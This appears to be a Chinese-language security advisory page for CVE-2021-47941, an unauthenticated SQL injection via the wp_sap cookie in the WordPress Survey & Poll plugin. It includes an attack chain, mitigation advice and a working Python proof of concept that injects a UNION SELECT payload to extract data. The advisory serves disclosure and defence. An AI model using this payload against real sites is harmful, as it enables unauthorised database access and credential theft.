IPBUF安全漏洞报告
English
CVE-2021-47941 CVSS 8.2 高危

CVE-2021-47941 WordPress Survey & Poll插件SQL注入漏洞

披露日期: 2026-05-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2021-47941
漏洞类型
SQL注入
CVSS评分
8.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WordPress Plugin Survey & Poll

相关标签

SQL注入WordPressSurvey & PollCVE-2021-47941无需认证数据泄露

漏洞概述

WordPress插件Survey & Poll 1.5.7.3及之前版本存在严重的SQL注入漏洞。该漏洞源于插件未对用户请求中的Cookie参数进行有效的安全过滤,导致未经身份认证的攻击者可以通过精心构造的`wp_sap` Cookie参数执行任意SQL查询。成功利用此漏洞可能导致攻击者从数据库中提取敏感信息,包括用户名、密码哈希及其他机密数据,严重威胁网站安全。

技术细节

该漏洞的核心在于WordPress插件Survey & Poll处理Cookie时的逻辑缺陷。插件代码直接读取HTTP请求头中的`wp_sap` Cookie值,并将其直接拼接到数据库查询语句中,未使用预处理语句或进行严格的输入验证。由于漏洞点位于Cookie处理逻辑中,且无需用户登录即可触发(PR:N),攻击者可以利用自动化工具轻易发送恶意请求。攻击者通常构造包含UNION SELECT语句的Payload,旨在合并查询结果,从而从`wp_users`等表中导出数据。由于CVSS评分为8.2,且具有高机密性影响,该漏洞属于高危级别,允许攻击者在无需交互的情况下远程获取数据库敏感内容。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描目标WordPress站点,检测是否安装了Survey & Poll插件及其版本信息。
STEP 2
2. 构造Payload
攻击者针对已知的SQL注入点,构造包含恶意SQL语句(如UNION SELECT)的Cookie数据。
STEP 3
3. 发送恶意请求
攻击者向目标服务器发送HTTP请求,并在Cookie头中注入恶意的`wp_sap`参数。
STEP 4
4. 执行SQL查询
服务器端插件代码直接处理Cookie值,导致恶意SQL语句在数据库中执行。
STEP 5
5. 数据泄露
攻击者分析服务器响应,提取泄露的敏感数据(如用户凭证、数据库结构等)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2021-47941 PoC: WordPress Plugin Survey & Poll SQL Injection # Target: WordPress Site with Survey & Poll Plugin <= 1.5.7.3 target_url = "http://example.com/" # Malicious payload injected via the wp_sap cookie # This payload attempts to extract the database version payload = "1' UNION SELECT 1, version(), 3, 4, 5, 6, 7, 8, 9, 10-- -" cookies = { "wp_sap": payload } try: response = requests.get(target_url, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the response for potential SQL errors or leaked data.") print(response.text[:500]) # Print first 500 chars for analysis else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Survey & Poll <= 1.5.7.3

防御指南

临时缓解措施
如果无法立即升级插件,建议暂时禁用该插件以阻断攻击路径。此外,可以通过服务器配置(如.htaccess或Nginx配置)重写或阻止包含特定恶意字符(如单引号、UNION关键字)的`wp_sap` Cookie请求,作为临时的缓解措施。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表